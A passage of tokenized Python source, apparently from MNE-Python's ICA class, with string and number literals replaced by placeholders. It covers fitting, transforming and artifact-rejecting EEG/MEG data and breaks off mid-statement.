score_funcs . update ( dict ( ( n , _make_xy_sfunc ( f , ndim_output = True ) ) <EOL> for n , f in xy_arg_stats_funcs <EOL> if _get_args ( f ) == [ '<STR_LIT:x>' , '<STR_LIT:y>' ] ) ) <EOL> return score_funcs <EOL> class ICA ( ContainsMixin ) : <EOL> """<STR_LIT>""" <EOL> @ verbose <EOL> def __init__ ( self , n_components = None , max_pca_components = None , <EOL> n_pca_components = None , noise_cov = None , random_state = None , <EOL> method = '<STR_LIT>' , fit_params = None , max_iter = <NUM_LIT:200> , <EOL> verbose = None ) : <EOL> methods = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> if method not in methods : <EOL> raise ValueError ( '<STR_LIT>' % <EOL> ( '<STR_LIT>' . 
join ( methods ) , method ) ) <EOL> if not check_version ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> raise RuntimeError ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . noise_cov = noise_cov <EOL> if max_pca_components is not None and n_components > max_pca_components : <EOL> raise ValueError ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> if isinstance ( n_components , float ) and not <NUM_LIT:0> < n_components <= <NUM_LIT:1> : <EOL> raise ValueError ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . current_fit = '<STR_LIT>' <EOL> self . verbose = verbose <EOL> self . n_components = n_components <EOL> self . max_pca_components = max_pca_components <EOL> self . n_pca_components = n_pca_components <EOL> self . ch_names = None <EOL> self . random_state = random_state <EOL> if fit_params is None : <EOL> fit_params = { } <EOL> fit_params = deepcopy ( fit_params ) <EOL> if "<STR_LIT>" in fit_params : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> if method == '<STR_LIT>' : <EOL> update = { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : None } <EOL> fit_params . update ( dict ( ( k , v ) for k , v in update . items ( ) if k <EOL> not in fit_params ) ) <EOL> elif method == '<STR_LIT>' : <EOL> fit_params . update ( { '<STR_LIT>' : False } ) <EOL> elif method == '<STR_LIT>' : <EOL> fit_params . update ( { '<STR_LIT>' : True } ) <EOL> if '<STR_LIT>' not in fit_params : <EOL> fit_params [ '<STR_LIT>' ] = max_iter <EOL> self . max_iter = max_iter <EOL> self . fit_params = fit_params <EOL> self . exclude = [ ] <EOL> self . info = None <EOL> self . method = method <EOL> def __repr__ ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . current_fit == '<STR_LIT>' : <EOL> s = '<STR_LIT>' <EOL> elif self . current_fit == '<STR_LIT>' : <EOL> s = '<STR_LIT>' <EOL> else : <EOL> s = '<STR_LIT>' <EOL> s += '<STR_LIT>' <EOL> s += '<STR_LIT>' % ( self . method , <EOL> str ( getattr ( self , '<STR_LIT>' , '<STR_LIT>' ) ) ) <EOL> s += ( '<STR_LIT>' % str ( self . 
n_components_ ) if <EOL> hasattr ( self , '<STR_LIT>' ) else <EOL> '<STR_LIT>' ) <EOL> if self . info is not None : <EOL> ch_fit = [ '<STR_LIT>' % c for c in _DATA_CH_TYPES_SPLIT if c in self ] <EOL> s += '<STR_LIT>' . format ( '<STR_LIT>' . join ( ch_fit ) ) <EOL> if self . exclude : <EOL> s += '<STR_LIT>' % len ( self . exclude ) <EOL> return '<STR_LIT>' % s <EOL> @ verbose <EOL> def fit ( self , inst , picks = None , start = None , stop = None , decim = None , <EOL> reject = None , flat = None , tstep = <NUM_LIT> , verbose = None ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( inst , _BaseRaw ) : <EOL> self . _fit_raw ( inst , picks , start , stop , decim , reject , flat , <EOL> tstep , verbose ) <EOL> elif isinstance ( inst , _BaseEpochs ) : <EOL> self . _fit_epochs ( inst , picks , decim , verbose ) <EOL> else : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> return self <EOL> def _reset ( self ) : <EOL> """<STR_LIT>""" <EOL> del self . _pre_whitener <EOL> del self . unmixing_matrix_ <EOL> del self . mixing_matrix_ <EOL> del self . n_components_ <EOL> del self . n_samples_ <EOL> del self . pca_components_ <EOL> del self . pca_explained_variance_ <EOL> del self . pca_mean_ <EOL> if hasattr ( self , '<STR_LIT>' ) : <EOL> del self . drop_inds_ <EOL> def _fit_raw ( self , raw , picks , start , stop , decim , reject , flat , tstep , <EOL> verbose ) : <EOL> """<STR_LIT>""" <EOL> if self . current_fit != '<STR_LIT>' : <EOL> self . _reset ( ) <EOL> if picks is None : <EOL> picks = _pick_data_channels ( raw . info , exclude = '<STR_LIT>' , <EOL> with_ref_meg = False ) <EOL> logger . info ( '<STR_LIT>' <EOL> '<STR_LIT>' % len ( picks ) ) <EOL> if self . max_pca_components is None : <EOL> self . max_pca_components = len ( picks ) <EOL> logger . info ( '<STR_LIT>' ) <EOL> self . info = pick_info ( raw . info , picks ) <EOL> if self . info [ '<STR_LIT>' ] : <EOL> self . info [ '<STR_LIT>' ] = [ ] <EOL> self . ch_names = self . 
info [ '<STR_LIT>' ] <EOL> start , stop = _check_start_stop ( raw , start , stop ) <EOL> data = raw [ picks , start : stop ] [ <NUM_LIT:0> ] <EOL> if decim is not None : <EOL> data = data [ : , : : decim ] <EOL> if ( reject is not None ) or ( flat is not None ) : <EOL> data , self . drop_inds_ = _reject_data_segments ( data , reject , flat , <EOL> decim , self . info , <EOL> tstep ) <EOL> self . n_samples_ = data . shape [ <NUM_LIT:1> ] <EOL> data , self . _pre_whitener = self . _pre_whiten ( data , raw . info , picks ) <EOL> self . _fit ( data , self . max_pca_components , '<STR_LIT>' ) <EOL> return self <EOL> def _fit_epochs ( self , epochs , picks , decim , verbose ) : <EOL> """<STR_LIT>""" <EOL> if self . current_fit != '<STR_LIT>' : <EOL> self . _reset ( ) <EOL> if picks is None : <EOL> picks = _pick_data_channels ( epochs . info , exclude = '<STR_LIT>' , <EOL> with_ref_meg = False ) <EOL> logger . info ( '<STR_LIT>' <EOL> '<STR_LIT>' % len ( picks ) ) <EOL> self . info = pick_info ( epochs . info , picks ) <EOL> if self . info [ '<STR_LIT>' ] : <EOL> self . info [ '<STR_LIT>' ] = [ ] <EOL> self . ch_names = self . info [ '<STR_LIT>' ] <EOL> if self . max_pca_components is None : <EOL> self . max_pca_components = len ( picks ) <EOL> logger . info ( '<STR_LIT>' ) <EOL> data = epochs . get_data ( ) [ : , picks ] <EOL> if decim is not None : <EOL> data = data [ : , : , : : decim ] <EOL> self . n_samples_ = np . prod ( data [ : , <NUM_LIT:0> , : ] . shape ) <EOL> data , self . _pre_whitener = self . _pre_whiten ( np . hstack ( data ) , epochs . info , picks ) <EOL> self . _fit ( data , self . max_pca_components , '<STR_LIT>' ) <EOL> return self <EOL> def _pre_whiten ( self , data , info , picks ) : <EOL> """<STR_LIT>""" <EOL> fast_dot = _get_fast_dot ( ) <EOL> has_pre_whitener = hasattr ( self , '<STR_LIT>' ) <EOL> if not has_pre_whitener and self . noise_cov is None : <EOL> info = pick_info ( info , picks ) <EOL> pre_whitener = np . 
empty ( [ len ( data ) , <NUM_LIT:1> ] ) <EOL> for ch_type in _DATA_CH_TYPES_SPLIT : <EOL> if _contains_ch_type ( info , ch_type ) : <EOL> if ch_type == '<STR_LIT>' : <EOL> this_picks = pick_types ( info , meg = False , seeg = True ) <EOL> elif ch_type == '<STR_LIT>' : <EOL> this_picks = pick_types ( info , meg = False , ecog = True ) <EOL> elif ch_type == '<STR_LIT>' : <EOL> this_picks = pick_types ( info , meg = False , eeg = True ) <EOL> else : <EOL> this_picks = pick_types ( info , meg = ch_type ) <EOL> pre_whitener [ this_picks ] = np . std ( data [ this_picks ] ) <EOL> data /= pre_whitener <EOL> elif not has_pre_whitener and self . noise_cov is not None : <EOL> pre_whitener , _ = compute_whitener ( self . noise_cov , info , picks ) <EOL> assert data . shape [ <NUM_LIT:0> ] == pre_whitener . shape [ <NUM_LIT:1> ] <EOL> data = fast_dot ( pre_whitener , data ) <EOL> elif has_pre_whitener and self . noise_cov is None : <EOL> data /= self . _pre_whitener <EOL> pre_whitener = self . _pre_whitener <EOL> else : <EOL> data = fast_dot ( self . _pre_whitener , data ) <EOL> pre_whitener = self . _pre_whitener <EOL> return data , pre_whitener <EOL> def _fit ( self , data , max_pca_components , fit_type ) : <EOL> """<STR_LIT>""" <EOL> from sklearn . decomposition import RandomizedPCA <EOL> random_state = check_random_state ( self . random_state ) <EOL> pca = RandomizedPCA ( n_components = max_pca_components , whiten = True , <EOL> copy = True , random_state = random_state ) <EOL> if isinstance ( self . n_components , float ) : <EOL> full_var = np . var ( data , axis = <NUM_LIT:1> ) . sum ( ) <EOL> data = pca . fit_transform ( data . T ) <EOL> if isinstance ( self . n_components , float ) : <EOL> explained_variance_ratio_ = pca . explained_variance_ / full_var <EOL> n_components_ = np . sum ( explained_variance_ratio_ . cumsum ( ) <= <EOL> self . 
n_components ) <EOL> if n_components_ < <NUM_LIT:1> : <EOL> raise RuntimeError ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> logger . info ( '<STR_LIT>' % <EOL> n_components_ ) <EOL> sel = slice ( n_components_ ) <EOL> else : <EOL> if self . n_components is not None : <EOL> sel = slice ( self . n_components ) <EOL> logger . info ( '<STR_LIT>' % <EOL> self . n_components ) <EOL> else : <EOL> logger . info ( '<STR_LIT>' <EOL> % len ( pca . components_ ) ) <EOL> sel = slice ( len ( pca . components_ ) ) <EOL> self . pca_mean_ = pca . mean_ <EOL> self . pca_components_ = pca . components_ <EOL> self . pca_explained_variance_ = exp_var = pca . explained_variance_ <EOL> self . pca_components_ *= np . sqrt ( exp_var [ : , None ] ) <EOL> del pca <EOL> self . n_components_ = sel . stop <EOL> if self . n_pca_components is not None : <EOL> if self . n_pca_components > len ( self . pca_components_ ) : <EOL> self . n_pca_components = len ( self . pca_components_ ) <EOL> if self . method == '<STR_LIT>' : <EOL> from sklearn . decomposition import FastICA <EOL> ica = FastICA ( whiten = False , <EOL> random_state = random_state , ** self . fit_params ) <EOL> ica . fit ( data [ : , sel ] ) <EOL> self . unmixing_matrix_ = getattr ( ica , '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> elif self . method in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> self . unmixing_matrix_ = infomax ( data [ : , sel ] , <EOL> random_state = random_state , <EOL> ** self . fit_params ) <EOL> self . unmixing_matrix_ /= np . sqrt ( exp_var [ sel ] ) [ None , : ] <EOL> self . mixing_matrix_ = linalg . pinv ( self . unmixing_matrix_ ) <EOL> self . current_fit = fit_type <EOL> def _transform ( self , data ) : <EOL> """<STR_LIT>""" <EOL> fast_dot = _get_fast_dot ( ) <EOL> if self . pca_mean_ is not None : <EOL> data -= self . pca_mean_ [ : , None ] <EOL> pca_data = fast_dot ( self . pca_components_ [ : self . n_components_ ] , data ) <EOL> sources = fast_dot ( self . 
unmixing_matrix_ , pca_data ) <EOL> return sources <EOL> def _transform_raw ( self , raw , start , stop ) : <EOL> if not hasattr ( self , '<STR_LIT>' ) : <EOL> raise RuntimeError ( '<STR_LIT>' ) <EOL> start , stop = _check_start_stop ( raw , start , stop ) <EOL> picks = pick_types ( raw . info , include = self . ch_names , exclude = '<STR_LIT>' , <EOL> meg = False , ref_meg = False ) <EOL> if len ( picks ) != len ( self . ch_names ) : <EOL> raise RuntimeError ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' % ( len ( self . ch_names ) , <EOL> len ( picks ) ) ) <EOL> data , _ = self . _pre_whiten ( raw [ picks , start : stop ] [ <NUM_LIT:0> ] , raw . info , picks ) <EOL> return self . _transform ( data ) <EOL> def _transform_epochs ( self , epochs , concatenate ) : <EOL> """<STR_LIT>""" <EOL> if not hasattr ( self , '<STR_LIT>' ) : <EOL> raise RuntimeError ( '<STR_LIT>' ) <EOL> picks = pick_types ( epochs . info , include = self . ch_names , exclude = '<STR_LIT>' , <EOL> meg = False , ref_meg = False ) <EOL> if len ( picks ) != len ( self . ch_names ) : <EOL> raise RuntimeError ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' % ( len ( self . ch_names ) , <EOL> len ( picks ) ) ) <EOL> data = np . hstack ( epochs . get_data ( ) [ : , picks ] ) <EOL> data , _ = self . _pre_whiten ( data , epochs . info , picks ) <EOL> sources = self . _transform ( data ) <EOL> if not concatenate : <EOL> sources = np . array ( np . split ( sources , len ( epochs . events ) , <NUM_LIT:1> ) ) <EOL> return sources <EOL> def _transform_evoked ( self , evoked ) : <EOL> """<STR_LIT>""" <EOL> if not hasattr ( self , '<STR_LIT>' ) : <EOL> raise RuntimeError ( '<STR_LIT>' ) <EOL> picks = pick_types ( evoked . info , include = self . ch_names , exclude = '<STR_LIT>' , <EOL> meg = False , ref_meg = False ) <EOL> if len ( picks ) != len ( self . 
ch_names ) : <EOL> raise RuntimeError ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' % ( len ( self . ch_names ) , <EOL> len ( picks ) ) ) <EOL> data , _ = self . _pre_whiten ( evoked . data [ picks ] , evoked . info , picks ) <EOL> sources = self . _transform ( data ) <EOL> return sources <EOL> def get_sources ( self , inst , add_channels = None , start = None , stop = None ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( inst , _BaseRaw ) : <EOL> sources = self . _sources_as_raw ( inst , add_channels , start , stop ) <EOL> elif isinstance ( inst , _BaseEpochs ) : <EOL> sources = self . _sources_as_epochs ( inst , add_channels , False ) <EOL> elif isinstance ( inst , Evoked ) : <EOL> sources = self . _sources_as_evoked ( inst , add_channels ) <EOL> else : <EOL> raise ValueError ( '<STR_LIT>' <EOL> '<STR_LIT:type>' ) <EOL> return sources <EOL> def _sources_as_raw ( self , raw , add_channels , start , stop ) : <EOL> """<STR_LIT>""" <EOL> sources = self . _transform_raw ( raw , start = start , stop = stop ) <EOL> if raw . preload : <EOL> data = raw . _data <EOL> del raw . _data <EOL> out = raw . copy ( ) <EOL> if raw . preload : <EOL> raw . _data = data <EOL> start , stop = _check_start_stop ( raw , start , stop ) <EOL> if add_channels is not None : <EOL> raw_picked = raw . copy ( ) . pick_channels ( add_channels ) <EOL> data_ , times_ = raw_picked [ : , start : stop ] <EOL> data_ = np . r_ [ sources , data_ ] <EOL> else : <EOL> data_ = sources <EOL> _ , times_ = raw [ <NUM_LIT:0> , start : stop ] <EOL> out . _data = data_ <EOL> out . _times = times_ <EOL> out . _filenames = list ( ) <EOL> out . preload = True <EOL> out . _first_samps = np . array ( [ raw . first_samp + <EOL> ( start if start else <NUM_LIT:0> ) ] ) <EOL> out . _last_samps = np . array ( [ out . first_samp + stop <EOL> if stop else raw . last_samp ] ) <EOL> out . _projector = None <EOL> self . _export_info ( out . info , raw , add_channels ) <EOL> out . 
_update_times ( ) <EOL> return out <EOL> def _sources_as_epochs ( self , epochs , add_channels , concatenate ) : <EOL> """<STR_LIT>""" <EOL> out = epochs . copy ( ) <EOL> sources = self . _transform_epochs ( epochs , concatenate ) <EOL> if add_channels is not None : <EOL> picks = [ epochs . ch_names . index ( k ) for k in add_channels ] <EOL> else : <EOL> picks = [ ] <EOL> out . _data = np . concatenate ( [ sources , epochs . get_data ( ) [ : , picks ] ] , <EOL> axis = <NUM_LIT:1> ) if len ( picks ) > <NUM_LIT:0> else sources <EOL> self . _export_info ( out . info , epochs , add_channels ) <EOL> out . preload = True <EOL> out . _raw = None <EOL> out . _projector = None <EOL> return out <EOL> def _sources_as_evoked ( self , evoked , add_channels ) : <EOL> """<STR_LIT>""" <EOL> if add_channels is not None : <EOL> picks = [ evoked . ch_names . index ( k ) for k in add_channels ] <EOL> else : <EOL> picks = [ ] <EOL> sources = self . _transform_evoked ( evoked ) <EOL> if len ( picks ) > <NUM_LIT:1> : <EOL> data = np . r_ [ sources , evoked . data [ picks ] ] <EOL> else : <EOL> data = sources <EOL> out = evoked . copy ( ) <EOL> out . data = data <EOL> self . _export_info ( out . info , evoked , add_channels ) <EOL> return out <EOL> def _export_info ( self , info , container , add_channels ) : <EOL> """<STR_LIT>""" <EOL> ch_names = [ ] <EOL> ch_info = info [ '<STR_LIT>' ] = [ ] <EOL> for ii in range ( self . n_components_ ) : <EOL> this_source = '<STR_LIT>' % ( ii + <NUM_LIT:1> ) <EOL> ch_names . append ( this_source ) <EOL> ch_info . append ( dict ( ch_name = this_source , cal = <NUM_LIT:1> , <EOL> logno = ii + <NUM_LIT:1> , coil_type = FIFF . FIFFV_COIL_NONE , <EOL> kind = FIFF . FIFFV_MISC_CH , <EOL> coord_Frame = FIFF . FIFFV_COORD_UNKNOWN , <EOL> loc = np . array ( [ <NUM_LIT:0.> , <NUM_LIT:0.> , <NUM_LIT:0.> , <NUM_LIT:1.> ] * <NUM_LIT:3> , dtype = '<STR_LIT>' ) , <EOL> unit = FIFF . 
FIFF_UNIT_NONE , <EOL> range = <NUM_LIT:1.0> , scanno = ii + <NUM_LIT:1> , unit_mul = <NUM_LIT:0> ) ) <EOL> if add_channels is not None : <EOL> ch_names += add_channels <EOL> ch_info += [ k for k in container . info [ '<STR_LIT>' ] if k [ '<STR_LIT>' ] in <EOL> add_channels ] <EOL> info [ '<STR_LIT>' ] = [ ch_names [ k ] for k in self . exclude ] <EOL> info [ '<STR_LIT>' ] = [ ] <EOL> info . _update_redundant ( ) <EOL> info . _check_consistency ( ) <EOL> @ verbose <EOL> def score_sources ( self , inst , target = None , score_func = '<STR_LIT>' , <EOL> start = None , stop = None , l_freq = None , h_freq = None , <EOL> verbose = None ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( inst , _BaseRaw ) : <EOL> sources = self . _transform_raw ( inst , start , stop ) <EOL> elif isinstance ( inst , _BaseEpochs ) : <EOL> sources = self . _transform_epochs ( inst , concatenate = True ) <EOL> elif isinstance ( inst , Evoked ) : <EOL> sources = self . _transform_evoked ( inst ) <EOL> else : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> if target is not None : <EOL> target = self . _check_target ( target , inst , start , stop ) <EOL> if sources . shape [ - <NUM_LIT:1> ] != target . shape [ - <NUM_LIT:1> ] : <EOL> raise ValueError ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> if verbose is None : <EOL> verbose = self . verbose <EOL> if isinstance ( inst , ( _BaseRaw , _BaseRaw ) ) : <EOL> sources , target = _band_pass_filter ( self , sources , target , <EOL> l_freq , h_freq , verbose ) <EOL> scores = _find_sources ( sources , target , score_func ) <EOL> return scores <EOL> def _check_target ( self , target , inst , start , stop ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( inst , _BaseRaw ) : <EOL> start , stop = _check_start_stop ( inst , start , stop ) <EOL> if hasattr ( target , '<STR_LIT>' ) : <EOL> if target . ndim < <NUM_LIT:2> : <EOL> target = target . reshape ( <NUM_LIT:1> , target . 
shape [ - <NUM_LIT:1> ] ) <EOL> if isinstance ( target , string_types ) : <EOL> pick = _get_target_ch ( inst , target ) <EOL> target , _ = inst [ pick , start : stop ] <EOL> elif isinstance ( inst , _BaseEpochs ) : <EOL> if isinstance ( target , string_types ) : <EOL> pick = _get_target_ch ( inst , target ) <EOL> target = inst . get_data ( ) [ : , pick ] <EOL> if hasattr ( target , '<STR_LIT>' ) : <EOL> if target . ndim == <NUM_LIT:3> and min ( target . shape ) == <NUM_LIT:1> : <EOL> target = target . ravel ( ) <EOL> elif isinstance ( inst , Evoked ) : <EOL> if isinstance ( target , string_types ) : <EOL> pick = _get_target_ch ( inst , target ) <EOL> target = inst . data [ pick ] <EOL> return target <EOL> @ verbose <EOL> def find_bads_ecg ( self , inst , ch_name = None , threshold = None , <EOL> start = None , stop = None , l_freq = <NUM_LIT:8> , h_freq = <NUM_LIT:16> , <EOL> method = '<STR_LIT>' , verbose = None ) : <EOL> """<STR_LIT>""" <EOL> if verbose is None : <EOL> verbose = self . verbose <EOL> idx_ecg = _get_ecg_channel_index ( ch_name , inst ) <EOL> if idx_ecg is None : <EOL> if verbose is not None : <EOL> verbose = self . verbose <EOL> ecg , times = _make_ecg ( inst , start , stop , verbose ) <EOL> ch_name = '<STR_LIT>' <EOL> else : <EOL> ecg = inst . ch_names [ idx_ecg ] <EOL> if inst . ch_names != self . ch_names : <EOL> extra_picks = pick_types ( inst . info , meg = False , ecg = True ) <EOL> ch_names_to_pick = ( self . ch_names + <EOL> [ inst . ch_names [ k ] for k in extra_picks ] ) <EOL> inst = inst . copy ( ) . pick_channels ( ch_names_to_pick ) <EOL> if method == '<STR_LIT>' : <EOL> if threshold is None : <EOL> threshold = <NUM_LIT> <EOL> if isinstance ( inst , _BaseRaw ) : <EOL> sources = self . get_sources ( create_ecg_epochs ( inst ) ) . get_data ( ) <EOL> elif isinstance ( inst , _BaseEpochs ) : <EOL> sources = self . get_sources ( inst ) . 
get_data ( ) <EOL> else : <EOL> raise ValueError ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> _ , p_vals , _ = ctps ( sources ) <EOL> scores = p_vals . max ( - <NUM_LIT:1> ) <EOL> ecg_idx = np . where ( scores >= threshold ) [ <NUM_LIT:0> ] <EOL> elif method == '<STR_LIT>' : <EOL> if threshold is None : <EOL> threshold = <NUM_LIT> <EOL> scores = self . score_sources ( inst , target = ecg , <EOL> score_func = '<STR_LIT>' , <EOL> start = start , stop = stop , <EOL> l_freq = l_freq , h_freq = h_freq , <EOL> verbose = verbose ) <EOL> ecg_idx = find_outliers ( scores , threshold = threshold ) <EOL> else : <EOL> raise ValueError ( '<STR_LIT>' % method ) <EOL> ecg_idx = ecg_idx [ np . abs ( scores [ ecg_idx ] ) . argsort ( ) [ : : - <NUM_LIT:1> ] ] <EOL> if not hasattr ( self , '<STR_LIT>' ) : <EOL> self . labels_ = dict ( ) <EOL> self . labels_ [ '<STR_LIT>' ] = list ( ecg_idx ) <EOL> self . labels_ [ '<STR_LIT>' % ch_name ] = list ( ecg_idx ) <EOL> return self . labels_ [ '<STR_LIT>' ] , scores <EOL> @ verbose <EOL> def find_bads_eog ( self , inst , ch_name = None , threshold = <NUM_LIT> , <EOL> start = None , stop = None , l_freq = <NUM_LIT:1> , h_freq = <NUM_LIT:10> , <EOL> verbose = None ) : <EOL> """<STR_LIT>""" <EOL> if verbose is None : <EOL> verbose = self . verbose <EOL> eog_inds = _get_eog_channel_index ( ch_name , inst ) <EOL> if len ( eog_inds ) > <NUM_LIT:2> : <EOL> eog_inds = eog_inds [ : <NUM_LIT:1> ] <EOL> logger . info ( '<STR_LIT>' % inst . ch_names [ eog_inds [ <NUM_LIT:0> ] ] ) <EOL> scores , eog_idx = [ ] , [ ] <EOL> eog_chs = [ inst . ch_names [ k ] for k in eog_inds ] <EOL> targets = [ self . _check_target ( k , inst , start , stop ) for k in eog_chs ] <EOL> if inst . ch_names != self . ch_names : <EOL> inst = inst . copy ( ) . pick_channels ( self . ch_names ) <EOL> if not hasattr ( self , '<STR_LIT>' ) : <EOL> self . labels_ = dict ( ) <EOL> for ii , ( eog_ch , target ) in enumerate ( zip ( eog_chs , targets ) ) : <EOL> scores += [ self . 
score_sources ( inst , target = target , <EOL> score_func = '<STR_LIT>' , <EOL> start = start , stop = stop , <EOL> l_freq = l_freq , h_freq = h_freq , <EOL> verbose = verbose ) ] <EOL> this_idx = find_outliers ( scores [ - <NUM_LIT:1> ] , threshold = threshold ) <EOL> eog_idx += [ this_idx ] <EOL> self . labels_ [ ( '<STR_LIT>' % ii ) + eog_ch ] = list ( this_idx ) <EOL> scores_ = np . concatenate ( [ scores [ ii ] [ inds ] <EOL> for ii , inds in enumerate ( eog_idx ) ] ) <EOL> eog_idx_ = np . concatenate ( eog_idx ) [ np . abs ( scores_ ) . argsort ( ) [ : : - <NUM_LIT:1> ] ] <EOL> eog_idx_unique = list ( np . unique ( eog_idx_ ) ) <EOL> eog_idx = [ ] <EOL> for i in eog_idx_ : <EOL> if i in eog_idx_unique : <EOL> eog_idx . append ( i ) <EOL> eog_idx_unique . remove ( i ) <EOL> if len ( scores ) == <NUM_LIT:1> : <EOL> scores = scores [ <NUM_LIT:0> ] <EOL> self . labels_ [ '<STR_LIT>' ] = list ( eog_idx ) <EOL> return self . labels_ [ '<STR_LIT>' ] , scores <EOL> def apply ( self , inst , include = None , exclude = None , <EOL> n_pca_components = None , start = None , stop = None , <EOL> copy = None ) : <EOL> """<STR_LIT>""" <EOL> inst = _check_copy_dep ( inst , copy ) <EOL> if isinstance ( inst , _BaseRaw ) : <EOL> out = self . _apply_raw ( raw = inst , include = include , <EOL> exclude = exclude , <EOL> n_pca_components = n_pca_components , <EOL> start = start , stop = stop ) <EOL> elif isinstance ( inst , _BaseEpochs ) : <EOL> out = self . _apply_epochs ( epochs = inst , include = include , <EOL> exclude = exclude , <EOL> n_pca_components = n_pca_components ) <EOL> elif isinstance ( inst , Evoked ) : <EOL> out = self . _apply_evoked ( evoked = inst , include = include , <EOL> exclude = exclude , <EOL> n_pca_components = n_pca_components ) <EOL> else : <EOL> raise ValueError ( '<STR_LIT>' <EOL> '<STR_LIT:type>' ) <EOL> return out <EOL> def _apply_raw ( self , raw , include , exclude , n_pca_components , start , stop ) : <EOL> """<STR_LIT>""" <EOL> if not raw . 
preload : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> if exclude is None : <EOL> exclude = list ( set ( self . exclude ) ) <EOL> else : <EOL> exclude = list ( set ( self . exclude + exclude ) ) <EOL> if n_pca_components is not None : <EOL> self . n_pca_components = n_pca_components <EOL> start , stop = _check_start_stop ( raw , start , stop ) <EOL> picks = pick_types ( raw . info , meg = False , include = self . ch_names , <EOL> exclude = '<STR_LIT>' , ref_meg = False ) <EOL> data = raw [ picks , start : stop ] [ <NUM_LIT:0> ] <EOL> data , _ = self . _pre_whiten ( data , raw . info , picks ) <EOL> data = self . _pick_sources ( data , include , exclude ) <EOL> raw [ picks , start : stop ] = data <EOL> return raw <EOL> def _apply_epochs ( self , epochs , include , exclude , n_pca_components ) : <EOL> if not epochs . preload : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> picks = pick_types ( epochs . info , meg = False , ref_meg = False , <EOL> include = self . ch_names , <EOL> exclude = '<STR_LIT>' ) <EOL> if len ( picks ) != len ( self . ch_names ) : <EOL> raise RuntimeError ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' % ( len ( self . ch_names ) , <EOL> len ( picks ) ) ) <EOL> if n_pca_components is not None : <EOL> self . n_pca_components = n_pca_components <EOL> data = np . hstack ( epochs . get_data ( ) [ : , picks ] ) <EOL> data , _ = self . _pre_whiten ( data , epochs . info , picks ) <EOL> data = self . _pick_sources ( data , include = include , exclude = exclude ) <EOL> epochs . _data [ : , picks ] = np . array ( np . split ( data , <EOL> len ( epochs . events ) , <NUM_LIT:1> ) ) <EOL> epochs . preload = True <EOL> return epochs <EOL> def _apply_evoked ( self , evoked , include , exclude , n_pca_components ) : <EOL> picks = pick_types ( evoked . info , meg = False , ref_meg = False , <EOL> include = self . ch_names , <EOL> exclude = '<STR_LIT>' ) <EOL> if len ( picks ) != len ( self . 
ch_names ) : <EOL> raise RuntimeError ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' % ( len ( self . ch_names ) , <EOL> len ( picks ) ) ) <EOL> if n_pca_components is not None : <EOL> self . n_pca_components = n_pca_components <EOL> data = evoked . data [ picks ] <EOL> data , _ = self . _pre_whiten ( data , evoked . info , picks ) <EOL> data = self . _pick_sources ( data , include = include , <EOL> exclude = exclude ) <EOL> evoked . data [ picks ] = data <EOL> return evoked <EOL> def _pick_sources ( self , data , include , exclude ) : <EOL> """<STR_LIT>""" <EOL> fast_dot = _get_fast_dot ( ) <EOL> if exclude is None : <EOL> exclude = self . exclude <EOL> else : <EOL> exclude = list ( set ( self . exclude + list ( exclude ) ) ) <EOL> _n_pca_comp = self . _check_n_pca_components ( self . n_pca_components ) <EOL> if not ( self . n_components_ <= _n_pca_comp <= self . max_pca_components ) : <EOL> raise ValueError ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> n_components = self . n_components_ <EOL> logger . info ( '<STR_LIT>' % n_components ) <EOL> if self . pca_mean_ is not None : <EOL> data -= self . pca_mean_ [ : , None ] <EOL> sel_keep = np . arange ( n_components ) <EOL> if include not in ( None , [ ] ) : <EOL> sel_keep = np . unique ( include ) <EOL> elif exclude not in ( None , [ ] ) : <EOL> sel_keep = np . setdiff1d ( np . arange ( n_components ) , exclude ) <EOL> logger . info ( '<STR_LIT>' <EOL> % ( n_components - len ( sel_keep ) ) ) <EOL> unmixing = np . eye ( _n_pca_comp ) <EOL> unmixing [ : n_components , : n_components ] = self . unmixing_matrix_ <EOL> unmixing = np . dot ( unmixing , self . pca_components_ [ : _n_pca_comp ] ) <EOL> mixing = np . eye ( _n_pca_comp ) <EOL> mixing [ : n_components , : n_components ] = self . mixing_matrix_ <EOL> mixing = np . dot ( self . pca_components_ [ : _n_pca_comp ] . T , mixing ) <EOL> if _n_pca_comp > n_components : <EOL> sel_keep = np . 
